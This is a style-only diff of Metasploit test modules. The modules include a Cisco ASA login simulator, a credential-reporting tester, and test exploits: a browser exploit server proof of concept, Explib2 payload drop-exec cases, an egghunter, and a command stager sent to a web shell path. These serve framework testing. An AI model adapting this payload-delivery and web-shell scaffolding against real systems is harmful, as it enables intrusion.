send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,13 +3,14 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Basic HttpServer Simulator',
|
||||
'Description' => %q{
|
||||
This is example of a basic HttpServer simulator, good for PR scenarios when a module
|
||||
|
@ -19,30 +20,29 @@ class MetasploitModule < Msf::Auxiliary
|
|||
This particular simulator will pretend to act like a Cisco ASA ASDM, so the
|
||||
cisco_asa_asdm.rb module can do a live test against it.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
'References' => [
|
||||
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2720' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'DefaultOptions' => {
|
||||
'SRVPORT' => 443,
|
||||
'SSL' => true,
|
||||
'URIPATH' => '/'
|
||||
},
|
||||
'Author' => [ 'sinn3r' ],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('USERNAME', [true, "The valid default username", "cisco"]),
|
||||
OptString.new('PASSWORD', [true, "The valid default password", "cisco"])
|
||||
], self.class)
|
||||
], self.class
|
||||
)
|
||||
|
||||
deregister_options('RHOST')
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Returns a response when the client is trying to check the connection
|
||||
#
|
||||
|
@ -50,7 +50,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
send_response(cli, '')
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Returns a response when the client is trying to authenticate
|
||||
#
|
||||
|
@ -59,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
when 'GET'
|
||||
# This must be the is_app_asdm? method asking
|
||||
print_status("Responding to the is_app_asdm? method")
|
||||
send_response(cli, '', {'Set-Cookie'=>'webvpn'})
|
||||
send_response(cli, '', { 'Set-Cookie' => 'webvpn' })
|
||||
|
||||
when 'POST'
|
||||
# This must be the do_login method. But before it can login, it must meet
|
||||
|
@ -97,7 +96,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, req)
|
||||
print_status("Received request: #{req.uri}")
|
||||
|
||||
|
@ -112,7 +110,6 @@ class MetasploitModule < Msf::Auxiliary
|
|||
send_not_found(cli)
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
exploit
|
||||
end
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Capture
|
||||
|
@ -25,8 +23,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
@@havepcap = false
|
||||
end
|
||||
|
||||
deregister_options('FILTER','PCAPFILE')
|
||||
|
||||
deregister_options('FILTER', 'PCAPFILE')
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
@ -39,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
p.udp_dport = 53
|
||||
p.payload = "HELLO WORLD"
|
||||
p.recalc
|
||||
ret = send(ip,p)
|
||||
ret = send(ip, p)
|
||||
if ret == :done
|
||||
print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
|
||||
else
|
||||
|
@ -48,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
close_pcap
|
||||
end
|
||||
|
||||
def send(ip,pkt)
|
||||
def send(ip, pkt)
|
||||
begin
|
||||
capture_sendto(pkt, ip)
|
||||
rescue RuntimeError => e
|
||||
|
@ -57,5 +54,4 @@ class MetasploitModule < Msf::Auxiliary
|
|||
return :done
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
|
@ -16,12 +14,10 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'Description' => 'Simple Recon Module Tester',
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
'Actions' => [
|
||||
['Continuous Port Sweep']
|
||||
],
|
||||
'PassiveActions' =>
|
||||
[
|
||||
'PassiveActions' => [
|
||||
'Continuous Port Sweep'
|
||||
]
|
||||
)
|
||||
|
@ -30,8 +26,8 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RHOST,
|
||||
Opt::RPORT,
|
||||
], self.class)
|
||||
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
FAKE_IP = '192.168.12.123'
|
||||
|
@ -13,14 +12,17 @@ class MetasploitModule < Msf::Auxiliary
|
|||
FAKE_PROOF = 'proof'
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "report_cred Test",
|
||||
'Description' => %q{
|
||||
This module will test every auxiliary module's report_cred method
|
||||
},
|
||||
'Author' => [ 'sinn3r' ],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def test_novell_mdm_creds
|
||||
|
@ -135,7 +137,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def test_dlink_dsl320b_password_extractor
|
||||
mod = framework.auxiliary.create('admin/http/dlink_dsl320b_password_extractor')
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||
end
|
||||
|
||||
def test_nexpose_xxe_file_read
|
||||
|
@ -165,7 +167,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def test_vnc
|
||||
mod = framework.auxiliary.create('server/capture/vnc')
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'vnc_client', user: '', password: FAKE_PASS, proof: FAKE_PROOF )
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'vnc_client', user: '', password: FAKE_PASS, proof: FAKE_PROOF)
|
||||
end
|
||||
|
||||
def test_smtp
|
||||
|
@ -175,12 +177,12 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def test_sip
|
||||
mod = framework.auxiliary.create('server/capture/sip')
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sip_client', user:FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sip_client', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||
end
|
||||
|
||||
def test_oracle_login
|
||||
mod = framework.auxiliary.create('admin/oracle/oracle_login')
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'oracle', user: FAKE_USER, password: FAKE_PASS )
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'oracle', user: FAKE_USER, password: FAKE_PASS)
|
||||
end
|
||||
|
||||
def test_postgresql
|
||||
|
@ -190,12 +192,12 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def test_pop3
|
||||
mod = framework.auxiliary.create('server/capture/pop3')
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||
end
|
||||
|
||||
def test_http_basic
|
||||
mod = framework.auxiliary.create('server/capture/http_basic')
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'HTTP', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'HTTP', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||
end
|
||||
|
||||
def test_ftp
|
||||
|
@ -245,7 +247,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def test_msf_rpc_login
|
||||
mod = framework.auxiliary.create('scanner/msf/msf_rpc_login')
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-rpc', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-rpc', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||
end
|
||||
|
||||
def test_mongodb_login
|
||||
|
@ -305,7 +307,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def test_rfcode_reader_enum
|
||||
mod = framework.auxiliary.create('scanner/http/rfcode_reader_enum')
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'RFCode Reader', user: FAKE_USER, password:FAKE_PASS, proof: FAKE_PROOF)
|
||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'RFCode Reader', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||
end
|
||||
|
||||
def test_radware_appdictor_enum
|
||||
|
@ -485,6 +487,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
counter_bad = 0
|
||||
self.methods.each do |m|
|
||||
next if m.to_s !~ /^test_.+/
|
||||
|
||||
print_status("Trying: ##{m.to_s}")
|
||||
begin
|
||||
self.send(m)
|
||||
|
@ -492,7 +495,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
counter_good += 1
|
||||
rescue ::Exception => e
|
||||
print_error("That blew up :-(")
|
||||
print_line("#{e.class} #{e.message}\n#{e.backtrace*"\n"}")
|
||||
print_line("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
counter_bad += 1
|
||||
ensure
|
||||
print_line
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
@ -20,8 +18,8 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT,
|
||||
], self.class)
|
||||
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def run_batch_size
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
@ -20,8 +18,8 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT,
|
||||
], self.class)
|
||||
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
|
|
@ -3,33 +3,34 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "Check Test",
|
||||
'Description' => %q{
|
||||
This module ensures that 'check' actually functions for Auxiilary modules.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
'References' => [
|
||||
[ 'OSVDB', '0' ]
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Author' => [
|
||||
'todb'
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80)
|
||||
], self.class)
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
|
|
|
@ -8,18 +8,16 @@ class MetasploitModule < Msf::Auxiliary
|
|||
update_info(
|
||||
info,
|
||||
'Name' => 'SQLite injection testing module',
|
||||
'Description' => '
|
||||
'Description' => %q{
|
||||
This module tests the SQL injection library against the SQLite database management system
|
||||
The target : https://github.com/incredibleindishell/sqlite-lab
|
||||
',
|
||||
'Author' =>
|
||||
[
|
||||
},
|
||||
'Author' => [
|
||||
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => %w[linux],
|
||||
'References' =>
|
||||
[],
|
||||
'References' => [],
|
||||
'Targets' => [['Wildcard Target', {}]],
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
|
|
|
@ -3,29 +3,27 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Internal Aggressive Test Exploit',
|
||||
'Description' =>
|
||||
"This module tests the exploitation of a test service.",
|
||||
'Description' => "This module tests the exploitation of a test service.",
|
||||
'Author' => 'skape',
|
||||
'License' => MSF_LICENSE,
|
||||
'Arch' => 'x86',
|
||||
'Payload' =>
|
||||
{
|
||||
'Payload' => {
|
||||
'Space' => 1000,
|
||||
'MaxNops' => 0,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
'Targets' => [
|
||||
# Target 0: Universal
|
||||
[
|
||||
'Any Platform',
|
||||
|
@ -58,7 +56,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
}
|
||||
],
|
||||
[ 'Test context encoder',
|
||||
[
|
||||
'Test context encoder',
|
||||
{
|
||||
'Platform' => [ 'linux', 'win' ],
|
||||
'Payload' =>
|
||||
|
@ -68,16 +67,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
|
||||
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
|
||||
])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
@ -89,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def exploit
|
||||
# Show disassembled payload for context encoder test
|
||||
if target.name =~ /context encoder/
|
||||
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
|
||||
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0, 40])
|
||||
end
|
||||
|
||||
connect
|
||||
|
|
|
@ -3,14 +3,15 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "IE Exploit for BrowserExploitServer Proof-of-Concept",
|
||||
'Description' => %q{
|
||||
Here's an example of building an exploit using the BrowserExploitServer.
|
||||
|
@ -20,20 +21,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'sinn3r' ],
|
||||
'References' =>
|
||||
[
|
||||
'References' => [
|
||||
[ 'URL', 'https://metasploit.com' ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
'BrowserRequirements' => {
|
||||
:source => /script|headers/i,
|
||||
#:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
|
||||
#:method => "LoadMovie",
|
||||
# :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
|
||||
# :method => "LoadMovie",
|
||||
:os_name => /win/i
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
'Targets' => [
|
||||
[ 'Automatic', {} ],
|
||||
[
|
||||
'Windows XP with IE 8',
|
||||
|
@ -67,14 +65,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
]
|
||||
],
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00", #Our spray doesn't like null bytes
|
||||
'Payload' => {
|
||||
'BadChars' => "\x00", # Our spray doesn't like null bytes
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => '2013-04-01',
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -3,31 +3,32 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "Check Test Exploit",
|
||||
'Description' => %q{
|
||||
This module ensures that 'check' actually functions for Exploit modules.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
'References' => [
|
||||
[ 'OSVDB', '0' ]
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Author' => [
|
||||
'todb'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => '2013-05-23'
|
||||
))
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80)
|
||||
], self.class)
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
|
|
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
|
||||
|
@ -12,47 +11,48 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Command Stager Web Test',
|
||||
'Description' => %q{
|
||||
This module tests the command stager mixin against a shell.jsp application installed
|
||||
on an Apache Tomcat server.
|
||||
},
|
||||
'Author' => 'bannedit',
|
||||
'References' =>
|
||||
[
|
||||
'References' => [
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'DefaultOptions' => {
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Payload' => {
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Privileged' => true,
|
||||
'Targets' =>
|
||||
[
|
||||
'Targets' => [
|
||||
# need more but this will likely cover most cases
|
||||
[ 'Automatic Targeting',
|
||||
[
|
||||
'Automatic Targeting',
|
||||
{
|
||||
'auto' => true
|
||||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => '2010-02-03'))
|
||||
'DisclosureDate' => '2010-02-03'
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
], self.class)
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
# This is method required for the CmdStager to work...
|
||||
def execute_command(cmd, opts)
|
||||
uri = opts[:uri]
|
||||
|
@ -63,7 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
opts = {
|
||||
:delay => 0.5,
|
||||
:uri => "/shell/shell.jsp?cmd=CMDS"
|
||||
|
@ -72,7 +71,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
execute_cmdstager(opts)
|
||||
|
||||
handler
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -3,37 +3,37 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::Remote::Dialup
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Test Dialup Exploit',
|
||||
'Description' => %q{
|
||||
This exploit connects to a system's modem over dialup and provides
|
||||
the user with a readout of the login banner.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Author' => [
|
||||
'I)ruid',
|
||||
],
|
||||
'Arch' => ARCH_TTY,
|
||||
'Platform' => ['unix'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Payload' =>
|
||||
{
|
||||
'Payload' => {
|
||||
'Space' => 1000,
|
||||
'BadChars' => '',
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
'Targets' => [
|
||||
[ 'Automatic', {} ],
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
|
|
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
|
@ -11,43 +10,46 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Egghunter
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Internal Egghunter Test Exploit',
|
||||
'Description' =>
|
||||
"This module tests the exploitation of a test service using the Egghunter.",
|
||||
'Description' => "This module tests the exploitation of a test service using the Egghunter.",
|
||||
'Author' => 'jduck',
|
||||
'License' => MSF_LICENSE,
|
||||
'Arch' => ARCH_X86,
|
||||
'Payload' =>
|
||||
{
|
||||
'Payload' => {
|
||||
'Space' => 1000,
|
||||
'MaxNops' => 0,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' => [
|
||||
[
|
||||
[ 'Windows',
|
||||
'Windows',
|
||||
{
|
||||
'Platform' => 'win'
|
||||
}
|
||||
],
|
||||
|
||||
[ 'Linux',
|
||||
[
|
||||
'Linux',
|
||||
{
|
||||
'Platform' => 'linux'
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
|
||||
])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
@ -57,7 +59,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
connect
|
||||
|
||||
print_status("Sending #{payload.encoded.length} byte payload...")
|
||||
|
@ -70,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
sploit = ''
|
||||
|
||||
# break before?
|
||||
#sploit << "\xcc"
|
||||
# sploit << "\xcc"
|
||||
sploit << eh_stub
|
||||
# just return otherwise
|
||||
sploit << "\xc3"
|
||||
|
|
|
@ -3,47 +3,45 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "Explib2 Drop Exec Test Case",
|
||||
'Description' => %q{
|
||||
This module allows to test integration of Explib2 into metasploit.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Author' => [
|
||||
'guhe120', # Original explib2 author
|
||||
'juan vazquez'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
'References' => [
|
||||
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
'BrowserRequirements' => {
|
||||
:source => /script/i,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_ver => '11.0'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ]
|
||||
'Targets' => [
|
||||
[ 'Automatic', {} ]
|
||||
],
|
||||
'DisclosureDate' => '2014-03-28',
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def exploit_html
|
||||
|
||||
exe_js = Rex::Text.to_unescape(generate_payload_exe, ENDIAN_LITTLE, "\\u")
|
||||
|
||||
template = %Q|<html>
|
||||
|
|
|
@ -3,42 +3,41 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "Explib2 Exec Test Case",
|
||||
'Description' => %q{
|
||||
This module allows to test integration of Explib2 into metasploit.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Author' => [
|
||||
'guhe120', # Original explib2 author
|
||||
'juan vazquez'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
'References' => [
|
||||
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
'BrowserRequirements' => {
|
||||
:source => /script/i,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_ver => '11.0'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ]
|
||||
'Targets' => [
|
||||
[ 'Automatic', {} ]
|
||||
],
|
||||
'DisclosureDate' => '2014-03-28',
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def exploit_html
|
||||
|
|
|
@ -3,27 +3,26 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'MIPS Aggressive Test Exploit',
|
||||
'Description' => 'This module tests the exploitation of a test service',
|
||||
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
|
||||
'License' => MSF_LICENSE,
|
||||
#'Arch' => ARCH_MIPSBE,
|
||||
'Payload' =>
|
||||
{
|
||||
# 'Arch' => ARCH_MIPSBE,
|
||||
'Payload' => {
|
||||
'MaxNops' => 0,
|
||||
#'BadChars' => "\x00",
|
||||
#'StackAdjustment' => -3500,
|
||||
# 'BadChars' => "\x00",
|
||||
# 'StackAdjustment' => -3500,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
'Targets' => [
|
||||
# Target 0: Universal
|
||||
[
|
||||
'Mips big endian',
|
||||
|
@ -82,18 +81,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
],
|
||||
|
||||
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
|
||||
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
|
||||
])
|
||||
]
|
||||
)
|
